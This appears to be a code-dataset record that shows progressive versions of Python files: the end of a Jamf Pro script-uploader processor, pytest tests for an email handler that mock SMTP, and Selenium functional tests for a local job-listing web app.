= False\n\n # clear any pre-existing summary result\n if \"jamfscriptuploader_summary_result\" in self.env:\n del self.env[\"jamfscriptuploader_summary_result\"]\n script_uploaded = False\n\n # obtain the relevant credentials\n token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.jamf_password)\n\n # get the id for a 
category if supplied\n if self.script_category:\n self.output(\"Checking categories for {}\".format(self.script_category))\n\n # check for existing category - requires obj_name\n obj_type = \"category\"\n obj_name = self.script_category\n category_id = self.get_uapi_obj_id_from_name(\n self.jamf_url,\n obj_type,\n obj_name,\n token,\n )\n\n if not category_id:\n self.output(\"WARNING: Category not found!\")\n category_id = \"-1\"\n else:\n self.output(\n \"Category {} found: ID={}\".format(self.script_category, category_id)\n )\n else:\n self.script_category = \"\"\n category_id = \"-1\"\n\n # handle files with a relative path\n if not self.script_path.startswith(\"/\"):\n found_template = self.get_path_to_file(self.script_path)\n if found_template:\n self.script_path = found_template\n else:\n raise ProcessorError(f\"ERROR: Script file {self.script_path} not found\")\n\n # now start the process of uploading the object\n if not self.script_name:\n self.script_name = os.path.basename(self.script_path)\n\n # check for existing script\n self.output(\n \"Checking for existing '{}' on {}\".format(self.script_name, self.jamf_url)\n )\n self.output(\n \"Full path: {}\".format(self.script_path),\n verbose_level=2,\n )\n obj_type = \"script\"\n obj_name = self.script_name\n obj_id = self.get_uapi_obj_id_from_name(\n self.jamf_url,\n obj_type,\n obj_name,\n token,\n )\n\n if obj_id:\n self.output(\n \"Script '{}' already exists: ID {}\".format(self.script_name, obj_id)\n )\n if self.replace:\n self.output(\n \"Replacing existing script as 'replace_script' is set to {}\".format(\n self.replace\n ),\n verbose_level=1,\n )\n else:\n self.output(\n \"Not replacing existing script. 
Use replace_script='True' to enforce.\",\n verbose_level=1,\n )\n return\n\n # post the script\n self.upload_script(\n self.jamf_url,\n self.script_name,\n self.script_path,\n category_id,\n self.script_category,\n self.script_info,\n self.script_notes,\n self.script_priority,\n self.script_parameter4,\n self.script_parameter5,\n self.script_parameter6,\n self.script_parameter7,\n self.script_parameter8,\n self.script_parameter9,\n self.script_parameter10,\n self.script_parameter11,\n self.osrequirements,\n token,\n obj_id,\n )\n script_uploaded = True\n\n # output the summary\n self.env[\"script_name\"] = self.script_name\n self.env[\"script_uploaded\"] = script_uploaded\n if script_uploaded:\n self.env[\"jamfscriptuploader_summary_result\"] = {\n \"summary_text\": \"The following scripts were created or updated in Jamf Pro:\",\n \"report_fields\": [\n \"script\",\n \"path\",\n \"category\",\n \"priority\",\n \"os_req\",\n \"info\",\n \"notes\",\n \"P4\",\n \"P5\",\n \"P6\",\n \"P7\",\n \"P8\",\n \"P9\",\n \"P10\",\n \"P11\",\n ],\n \"data\": {\n \"script\": self.script_name,\n \"path\": self.script_path,\n \"category\": self.script_category,\n \"priority\": str(self.script_priority),\n \"info\": self.script_info,\n \"os_req\": self.osrequirements,\n \"notes\": self.script_notes,\n \"P4\": self.script_parameter4,\n \"P5\": self.script_parameter5,\n \"P6\": self.script_parameter6,\n \"P7\": self.script_parameter7,\n \"P8\": self.script_parameter8,\n \"P9\": self.script_parameter9,\n \"P10\": self.script_parameter10,\n \"P11\": self.script_parameter11,\n },\n }\n\n\nif __name__ == \"__main__\":\n PROCESSOR = JamfScriptUploader()\n PROCESSOR.execute_shell()\n",
"step-ids": [
1,
4,
5,
7,
8
]
}
|
[
1,
4,
5,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_send_requirements(config):
    """publish() must raise InsuficientInformation while required fields are missing."""
    handler = EmailHandler(config)
    # Each payload is missing at least one required field ('data' is never given).
    incomplete_payloads = (
        {},
        {'recipient': 'charpe@mailinator.com'},
        {'recipient': 'charpe@mailinator.com', 'subject': 'The subject'},
    )
    for payload in incomplete_payloads:
        with pytest.raises(InsuficientInformation):
            handler.publish(payload)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_send_requirements(config):
    """An EmailHandler rejects payloads that lack recipient, subject or data."""
    handler = EmailHandler(config)
    # None of these payloads carries everything publish() needs.
    for bad_payload in (
        {},
        {'recipient': 'charpe@mailinator.com'},
        {'recipient': 'charpe@mailinator.com', 'subject': 'The subject'},
    ):
        with pytest.raises(InsuficientInformation):
            handler.publish(bad_payload)
def test_send(config, caplog, mocker):
    """A complete payload is rendered into a multipart message and sent once."""
    # Replace smtplib.SMTP with a factory returning a recording stub,
    # so no real network connection is attempted.
    smtp_client = MagicMock()
    mocker.patch('smtplib.SMTP', new=MagicMock(return_value=smtp_client))

    handler = EmailHandler(config)
    handler.publish({
        'recipient': 'charpe@mailinator.com',
        'subject': 'The subject',
        'data': {'content': 'El mensaje'},
    })

    # Exactly one message went out, with the expected envelope headers.
    smtp_client.send_message.assert_called_once()
    message = smtp_client.send_message.call_args[0][0]
    assert message.get('From') == config['MAIL_DEFAULT_SENDER']
    assert message.get('To') == 'charpe@mailinator.com'

    # The multipart body carries the content in both alternatives.
    html_part, text_part = message.get_payload()
    assert 'El mensaje' in text_part.get_payload()
    assert '<p>El mensaje</p>' in html_part.get_payload()

    # The SMTP session is closed after sending.
    smtp_client.quit.assert_called_once()
<|reserved_special_token_1|>
from unittest.mock import MagicMock
import pytest
from charpe.mediums.email_handler import EmailHandler
from charpe.errors import InsuficientInformation
def test_send_requirements(config):
    """publish() raises InsuficientInformation for every incomplete payload."""
    handler = EmailHandler(config)
    # Progressively fuller payloads, all still missing something required.
    cases = [
        {},
        {'recipient': 'charpe@mailinator.com'},
        {'recipient': 'charpe@mailinator.com', 'subject': 'The subject'},
    ]
    for case in cases:
        with pytest.raises(InsuficientInformation):
            handler.publish(case)
def test_send(config, caplog, mocker):
the_mock = MagicMock()
smoke = MagicMock(return_value=the_mock)
mocker.patch('smtplib.SMTP', new=smoke)
handler = EmailHandler(config)
handler.publish({'recipient': 'charpe@mailinator.com', 'subject':
'The subject', 'data': {'content': 'El mensaje'}})
the_mock.send_message.assert_called_once()
msg = the_mock.send_message.call_args[0][0]
assert msg.get('From') == config['MAIL_DEFAULT_SENDER']
assert msg.get('To') == 'charpe@mailinator.com'
html, text = msg.get_payload()
assert 'El mensaje' in text.get_payload()
assert '<p>El mensaje</p>' in html.get_payload()
the_mock.quit.assert_called_once()
<|reserved_special_token_1|>
from unittest.mock import MagicMock
import pytest
from charpe.mediums.email_handler import EmailHandler
from charpe.errors import InsuficientInformation
def test_send_requirements(config):
handler = EmailHandler(config)
with pytest.raises(InsuficientInformation):
handler.publish({})
with pytest.raises(InsuficientInformation):
handler.publish({
'recipient': 'charpe@mailinator.com',
})
with pytest.raises(InsuficientInformation):
handler.publish({
'recipient': 'charpe@mailinator.com',
'subject': 'The subject',
})
def test_send(config, caplog, mocker):
the_mock = MagicMock()
smoke = MagicMock(return_value=the_mock)
mocker.patch('smtplib.SMTP', new=smoke)
handler = EmailHandler(config)
handler.publish({
'recipient': 'charpe@mailinator.com',
'subject': 'The subject',
'data': {
'content': 'El mensaje',
},
})
the_mock.send_message.assert_called_once()
msg = the_mock.send_message.call_args[0][0]
assert msg.get('From') == config['MAIL_DEFAULT_SENDER']
assert msg.get('To') == 'charpe@mailinator.com'
html, text = msg.get_payload()
assert 'El mensaje' in text.get_payload()
assert '<p>El mensaje</p>' in html.get_payload()
the_mock.quit.assert_called_once()
|
flexible
|
{
"blob_id": "e2d8a1e13a4162cd606eec12530451ab230c95b6",
"index": 3103,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_send_requirements(config):\n handler = EmailHandler(config)\n with pytest.raises(InsuficientInformation):\n handler.publish({})\n with pytest.raises(InsuficientInformation):\n handler.publish({'recipient': 'charpe@mailinator.com'})\n with pytest.raises(InsuficientInformation):\n handler.publish({'recipient': 'charpe@mailinator.com', 'subject':\n 'The subject'})\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef test_send_requirements(config):\n handler = EmailHandler(config)\n with pytest.raises(InsuficientInformation):\n handler.publish({})\n with pytest.raises(InsuficientInformation):\n handler.publish({'recipient': 'charpe@mailinator.com'})\n with pytest.raises(InsuficientInformation):\n handler.publish({'recipient': 'charpe@mailinator.com', 'subject':\n 'The subject'})\n\n\ndef test_send(config, caplog, mocker):\n the_mock = MagicMock()\n smoke = MagicMock(return_value=the_mock)\n mocker.patch('smtplib.SMTP', new=smoke)\n handler = EmailHandler(config)\n handler.publish({'recipient': 'charpe@mailinator.com', 'subject':\n 'The subject', 'data': {'content': 'El mensaje'}})\n the_mock.send_message.assert_called_once()\n msg = the_mock.send_message.call_args[0][0]\n assert msg.get('From') == config['MAIL_DEFAULT_SENDER']\n assert msg.get('To') == 'charpe@mailinator.com'\n html, text = msg.get_payload()\n assert 'El mensaje' in text.get_payload()\n assert '<p>El mensaje</p>' in html.get_payload()\n the_mock.quit.assert_called_once()\n",
"step-4": "from unittest.mock import MagicMock\nimport pytest\nfrom charpe.mediums.email_handler import EmailHandler\nfrom charpe.errors import InsuficientInformation\n\n\ndef test_send_requirements(config):\n handler = EmailHandler(config)\n with pytest.raises(InsuficientInformation):\n handler.publish({})\n with pytest.raises(InsuficientInformation):\n handler.publish({'recipient': 'charpe@mailinator.com'})\n with pytest.raises(InsuficientInformation):\n handler.publish({'recipient': 'charpe@mailinator.com', 'subject':\n 'The subject'})\n\n\ndef test_send(config, caplog, mocker):\n the_mock = MagicMock()\n smoke = MagicMock(return_value=the_mock)\n mocker.patch('smtplib.SMTP', new=smoke)\n handler = EmailHandler(config)\n handler.publish({'recipient': 'charpe@mailinator.com', 'subject':\n 'The subject', 'data': {'content': 'El mensaje'}})\n the_mock.send_message.assert_called_once()\n msg = the_mock.send_message.call_args[0][0]\n assert msg.get('From') == config['MAIL_DEFAULT_SENDER']\n assert msg.get('To') == 'charpe@mailinator.com'\n html, text = msg.get_payload()\n assert 'El mensaje' in text.get_payload()\n assert '<p>El mensaje</p>' in html.get_payload()\n the_mock.quit.assert_called_once()\n",
"step-5": "from unittest.mock import MagicMock\nimport pytest\n\nfrom charpe.mediums.email_handler import EmailHandler\nfrom charpe.errors import InsuficientInformation\n\n\ndef test_send_requirements(config):\n handler = EmailHandler(config)\n\n with pytest.raises(InsuficientInformation):\n handler.publish({})\n\n with pytest.raises(InsuficientInformation):\n handler.publish({\n 'recipient': 'charpe@mailinator.com',\n })\n\n with pytest.raises(InsuficientInformation):\n handler.publish({\n 'recipient': 'charpe@mailinator.com',\n 'subject': 'The subject',\n })\n\n\ndef test_send(config, caplog, mocker):\n the_mock = MagicMock()\n smoke = MagicMock(return_value=the_mock)\n mocker.patch('smtplib.SMTP', new=smoke)\n\n handler = EmailHandler(config)\n\n handler.publish({\n 'recipient': 'charpe@mailinator.com',\n 'subject': 'The subject',\n 'data': {\n 'content': 'El mensaje',\n },\n })\n\n the_mock.send_message.assert_called_once()\n msg = the_mock.send_message.call_args[0][0]\n\n assert msg.get('From') == config['MAIL_DEFAULT_SENDER']\n assert msg.get('To') == 'charpe@mailinator.com'\n\n html, text = msg.get_payload()\n\n assert 'El mensaje' in text.get_payload()\n assert '<p>El mensaje</p>' in html.get_payload()\n\n the_mock.quit.assert_called_once()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class FunctionalTest(TestCase):
def setUp(self):
self.browser = webdriver.Chrome('C:\\chromedriver\\chromedriver.exe')
self.browser.implicitly_wait(2)
def tearDown(self):
self.browser.quit()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_verDetalle(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', h2.text)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_listado(self):
self.browser.get('http://localhost:8000')
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="pepito perez"]')
self.assertIn('pepito perez', span.text)
def test_buscar(self):
self.browser.get('http://localhost:8000')
correo = self.browser.find_element_by_id('buscar')
correo.send_keys('Betzy Editado Montanez Editado')
botonBuscar = self.browser.find_element_by_id('id_buscar')
botonBuscar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FunctionalTest(TestCase):
def setUp(self):
self.browser = webdriver.Chrome('C:\\chromedriver\\chromedriver.exe')
self.browser.implicitly_wait(2)
def tearDown(self):
self.browser.quit()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_verDetalle(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', h2.text)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_Comentar(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
correo = self.browser.find_element_by_id('correo')
correo.send_keys('prueba@prueba.com')
comentario = self.browser.find_element_by_id('comentario')
comentario.send_keys('Comentario Prueba')
botonAceptar = self.browser.find_element_by_id('id_comentar')
botonAceptar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//p[text()="Comentario Prueba"]')
self.assertIn('Comentario Prueba', span.text)
def test_listado(self):
self.browser.get('http://localhost:8000')
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="pepito perez"]')
self.assertIn('pepito perez', span.text)
def test_buscar(self):
self.browser.get('http://localhost:8000')
correo = self.browser.find_element_by_id('buscar')
correo.send_keys('Betzy Editado Montanez Editado')
botonBuscar = self.browser.find_element_by_id('id_buscar')
botonBuscar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FunctionalTest(TestCase):
def setUp(self):
self.browser = webdriver.Chrome('C:\\chromedriver\\chromedriver.exe')
self.browser.implicitly_wait(2)
def tearDown(self):
self.browser.quit()
def test_title(self):
self.browser.get('http://localhost:8000')
self.assertIn('BuscoAyuda', self.browser.title)
<|reserved_special_token_0|>
def test_verDetalle(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', h2.text)
<|reserved_special_token_0|>
def test_Editar(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_login')
link.click()
nombreUsuario = self.browser.find_element_by_id('username')
nombreUsuario.send_keys('ba.montanez')
claveIngreso = self.browser.find_element_by_id('password')
claveIngreso.send_keys('prueba123')
botonIngresar = self.browser.find_element_by_id('id_ingresar')
botonIngresar.click()
self.browser.implicitly_wait(3)
linkEditar = self.browser.find_element_by_id('id_editar')
linkEditar.click()
nombre = self.browser.find_element_by_id('id_nombre')
nombre.clear()
nombre.send_keys('Betzy Editado')
apellidos = self.browser.find_element_by_id('id_apellidos')
apellidos.clear()
apellidos.send_keys('Montanez Editado')
experiencia = self.browser.find_element_by_id('id_aniosExperiencia')
experiencia.clear()
experiencia.send_keys('10')
self.browser.find_element_by_xpath(
"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']"
).click()
telefono = self.browser.find_element_by_id('id_telefono')
telefono.clear()
telefono.send_keys('313555666')
correo = self.browser.find_element_by_id('id_correo')
correo.clear()
correo.send_keys('ba.montanez01@uniandes.edu.co')
imagen = self.browser.find_element_by_id('id_imagen')
imagen.send_keys('C:\\chromedriver\\developer.jpg')
nombreUsuario = self.browser.find_element_by_id('id_username')
nombreUsuario.clear()
nombreUsuario.send_keys('ba.montanez2')
clave = self.browser.find_element_by_id('id_password')
clave.clear()
clave.send_keys('prueba1234')
botonGrabar = self.browser.find_element_by_id('id_editar')
botonGrabar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
def test_Comentar(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
correo = self.browser.find_element_by_id('correo')
correo.send_keys('prueba@prueba.com')
comentario = self.browser.find_element_by_id('comentario')
comentario.send_keys('Comentario Prueba')
botonAceptar = self.browser.find_element_by_id('id_comentar')
botonAceptar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//p[text()="Comentario Prueba"]')
self.assertIn('Comentario Prueba', span.text)
def test_listado(self):
self.browser.get('http://localhost:8000')
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="pepito perez"]')
self.assertIn('pepito perez', span.text)
def test_buscar(self):
self.browser.get('http://localhost:8000')
correo = self.browser.find_element_by_id('buscar')
correo.send_keys('Betzy Editado Montanez Editado')
botonBuscar = self.browser.find_element_by_id('id_buscar')
botonBuscar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
<|reserved_special_token_1|>
__author__ = 'asistente'
from unittest import TestCase
from selenium import webdriver
from selenium.webdriver.common.by import By
class FunctionalTest(TestCase):
def setUp(self):
self.browser = webdriver.Chrome('C:\\chromedriver\\chromedriver.exe')
self.browser.implicitly_wait(2)
def tearDown(self):
self.browser.quit()
def test_title(self):
self.browser.get('http://localhost:8000')
self.assertIn('BuscoAyuda', self.browser.title)
def test_registro(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_register')
link.click()
nombre = self.browser.find_element_by_id('id_nombre')
nombre.send_keys('Rafael')
apellidos = self.browser.find_element_by_id('id_apellidos')
apellidos.send_keys('Medrano')
experiencia = self.browser.find_element_by_id('id_aniosExperiencia')
experiencia.send_keys('7')
self.browser.find_element_by_xpath(
"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']"
).click()
telefono = self.browser.find_element_by_id('id_telefono')
telefono.send_keys('3135555555')
correo = self.browser.find_element_by_id('id_correo')
correo.send_keys('re.medrano@uniandes.edu.co')
imagen = self.browser.find_element_by_id('id_imagen')
imagen.send_keys('C:\\chromedriver\\developer.jpg')
nombreUsuario = self.browser.find_element_by_id('id_username')
nombreUsuario.send_keys('re.medrano')
clave = self.browser.find_element_by_id('id_password')
clave.send_keys('prueba123')
botonGrabar = self.browser.find_element_by_id('id_grabar')
botonGrabar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Rafael Medrano"]')
self.assertIn('Rafael Medrano', span.text)
def test_verDetalle(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', h2.text)
def test_login(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_login')
link.click()
nombreUsuario = self.browser.find_element_by_id('username')
nombreUsuario.send_keys('ba.montanez')
clave = self.browser.find_element_by_id('password')
clave.send_keys('prueba123')
botonIngresar = self.browser.find_element_by_id('id_ingresar')
botonIngresar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH, '//span[text()=" Logout"]')
self.assertIn('Logout', span.text)
def test_Editar(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_login')
link.click()
nombreUsuario = self.browser.find_element_by_id('username')
nombreUsuario.send_keys('ba.montanez')
claveIngreso = self.browser.find_element_by_id('password')
claveIngreso.send_keys('prueba123')
botonIngresar = self.browser.find_element_by_id('id_ingresar')
botonIngresar.click()
self.browser.implicitly_wait(3)
linkEditar = self.browser.find_element_by_id('id_editar')
linkEditar.click()
nombre = self.browser.find_element_by_id('id_nombre')
nombre.clear()
nombre.send_keys('Betzy Editado')
apellidos = self.browser.find_element_by_id('id_apellidos')
apellidos.clear()
apellidos.send_keys('Montanez Editado')
experiencia = self.browser.find_element_by_id('id_aniosExperiencia')
experiencia.clear()
experiencia.send_keys('10')
self.browser.find_element_by_xpath(
"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']"
).click()
telefono = self.browser.find_element_by_id('id_telefono')
telefono.clear()
telefono.send_keys('313555666')
correo = self.browser.find_element_by_id('id_correo')
correo.clear()
correo.send_keys('ba.montanez01@uniandes.edu.co')
imagen = self.browser.find_element_by_id('id_imagen')
imagen.send_keys('C:\\chromedriver\\developer.jpg')
nombreUsuario = self.browser.find_element_by_id('id_username')
nombreUsuario.clear()
nombreUsuario.send_keys('ba.montanez2')
clave = self.browser.find_element_by_id('id_password')
clave.clear()
clave.send_keys('prueba1234')
botonGrabar = self.browser.find_element_by_id('id_editar')
botonGrabar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
def test_Comentar(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH,
'//h2[text()="Betzy Editado Montanez Editado"]')
correo = self.browser.find_element_by_id('correo')
correo.send_keys('prueba@prueba.com')
comentario = self.browser.find_element_by_id('comentario')
comentario.send_keys('Comentario Prueba')
botonAceptar = self.browser.find_element_by_id('id_comentar')
botonAceptar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//p[text()="Comentario Prueba"]')
self.assertIn('Comentario Prueba', span.text)
def test_listado(self):
self.browser.get('http://localhost:8000')
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH,
'//span[text()="pepito perez"]')
self.assertIn('pepito perez', span.text)
def test_buscar(self):
self.browser.get('http://localhost:8000')
correo = self.browser.find_element_by_id('buscar')
correo.send_keys('Betzy Editado Montanez Editado')
botonBuscar = self.browser.find_element_by_id('id_buscar')
botonBuscar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH,
'//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
<|reserved_special_token_1|>
__author__ = 'asistente'
#from __future__ import absolute_import
from unittest import TestCase
from selenium import webdriver
from selenium.webdriver.common.by import By
class FunctionalTest(TestCase):
def setUp(self):
self.browser = webdriver.Chrome("C:\\chromedriver\\chromedriver.exe")
self.browser.implicitly_wait(2)
def tearDown(self):
self.browser.quit()
def test_title(self):
self.browser.get('http://localhost:8000')
self.assertIn('BuscoAyuda', self.browser.title)
def test_registro(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_register')
link.click()
nombre = self.browser.find_element_by_id('id_nombre')
nombre.send_keys('Rafael')
apellidos = self.browser.find_element_by_id('id_apellidos')
apellidos.send_keys('Medrano')
experiencia = self.browser.find_element_by_id('id_aniosExperiencia')
experiencia.send_keys('7')
self.browser.find_element_by_xpath(
"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']").click()
telefono = self.browser.find_element_by_id('id_telefono')
telefono.send_keys('3135555555')
correo = self.browser.find_element_by_id('id_correo')
correo.send_keys('re.medrano@uniandes.edu.co')
imagen = self.browser.find_element_by_id('id_imagen')
imagen.send_keys('C:\chromedriver\developer.jpg')
nombreUsuario = self.browser.find_element_by_id('id_username')
nombreUsuario.send_keys('re.medrano')
clave = self.browser.find_element_by_id('id_password')
clave.send_keys('prueba123')
botonGrabar = self.browser.find_element_by_id('id_grabar')
botonGrabar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH, '//span[text()="Rafael Medrano"]')
self.assertIn('Rafael Medrano', span.text)
def test_verDetalle(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH, '//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH, '//h2[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', h2.text)
def test_login(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_login')
link.click()
nombreUsuario = self.browser.find_element_by_id('username')
nombreUsuario.send_keys('ba.montanez')
clave = self.browser.find_element_by_id('password')
clave.send_keys('prueba123')
botonIngresar = self.browser.find_element_by_id('id_ingresar')
botonIngresar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH, '//span[text()=" Logout"]')
self.assertIn('Logout', span.text)
def test_Editar(self):
self.browser.get('http://localhost:8000')
link = self.browser.find_element_by_id('id_login')
link.click()
nombreUsuario = self.browser.find_element_by_id('username')
nombreUsuario.send_keys('ba.montanez')
claveIngreso = self.browser.find_element_by_id('password')
claveIngreso.send_keys('prueba123')
botonIngresar = self.browser.find_element_by_id('id_ingresar')
botonIngresar.click()
self.browser.implicitly_wait(3)
linkEditar = self.browser.find_element_by_id('id_editar')
linkEditar.click()
nombre = self.browser.find_element_by_id('id_nombre')
nombre.clear()
nombre.send_keys('Betzy Editado')
apellidos = self.browser.find_element_by_id('id_apellidos')
apellidos.clear()
apellidos.send_keys('Montanez Editado')
experiencia = self.browser.find_element_by_id('id_aniosExperiencia')
experiencia.clear()
experiencia.send_keys('10')
self.browser.find_element_by_xpath(
"//select[@id='id_tiposDeServicio']/option[text()='Desarrollador Web']").click()
telefono = self.browser.find_element_by_id('id_telefono')
telefono.clear()
telefono.send_keys('313555666')
correo = self.browser.find_element_by_id('id_correo')
correo.clear()
correo.send_keys('ba.montanez01@uniandes.edu.co')
imagen = self.browser.find_element_by_id('id_imagen')
imagen.send_keys('C:\chromedriver\developer.jpg')
nombreUsuario = self.browser.find_element_by_id('id_username')
nombreUsuario.clear()
nombreUsuario.send_keys('ba.montanez2')
clave = self.browser.find_element_by_id('id_password')
clave.clear()
clave.send_keys('prueba1234')
botonGrabar = self.browser.find_element_by_id('id_editar')
botonGrabar.click()
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH, '//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
def test_Comentar(self):
self.browser.get('http://localhost:8000')
span = self.browser.find_element(By.XPATH, '//span[text()="Betzy Editado Montanez Editado"]')
span.click()
self.browser.implicitly_wait(3)
h2 = self.browser.find_element(By.XPATH, '//h2[text()="Betzy Editado Montanez Editado"]')
correo = self.browser.find_element_by_id('correo')
correo.send_keys('prueba@prueba.com')
comentario = self.browser.find_element_by_id('comentario')
comentario.send_keys('Comentario Prueba')
botonAceptar = self.browser.find_element_by_id('id_comentar')
botonAceptar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH, '//p[text()="Comentario Prueba"]')
self.assertIn('Comentario Prueba', span.text)
def test_listado(self):
self.browser.get('http://localhost:8000')
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH, '//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
self.browser.implicitly_wait(3)
span = self.browser.find_element(By.XPATH, '//span[text()="pepito perez"]')
self.assertIn('pepito perez', span.text)
def test_buscar(self):
self.browser.get('http://localhost:8000')
correo = self.browser.find_element_by_id('buscar')
correo.send_keys('Betzy Editado Montanez Editado')
botonBuscar = self.browser.find_element_by_id('id_buscar')
botonBuscar.click()
self.browser.implicitly_wait(6)
span = self.browser.find_element(By.XPATH, '//span[text()="Betzy Editado Montanez Editado"]')
self.assertIn('Betzy Editado Montanez Editado', span.text)
|
flexible
|
{
"blob_id": "fc4cf800c663abf20bfba7fcc1032e09a992641b",
"index": 5334,
